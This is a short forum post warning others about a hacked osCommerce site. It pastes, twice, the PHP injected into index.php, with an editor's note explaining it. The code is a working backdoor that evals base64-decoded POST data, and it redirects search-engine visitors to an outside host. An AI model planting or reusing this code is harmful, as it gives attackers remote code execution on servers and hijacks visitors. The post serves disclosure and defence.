spufus Posted January 14, 2009

A friend of mine had his site hacked yesterday. I found index.php had its permissions changed to 777 & this in the top line of index.php:

```php
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}} ?><?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=&...;.$_SERVER['HTTP_HOST']);die();}} ?><?php /*
```

[Editor's note: the injected block appears twice in the paste. Its first statement is a backdoor: it passes base64-decoded POST data to eval(), so whoever planted it could run arbitrary PHP on the server. The rest of the block sends visitors arriving from Google or Yahoo search results to the external host. Because the backdoor allowed arbitrary code to run, a cleanup should also look for other added or modified files, review the access logs for POST requests to index.php, and rotate the site's credentials.]

Fixed in a couple of mins & no other files affected. Just a warning to others to be careful. I think he's using an old version of OSC - reckon he'll be upgrading now!!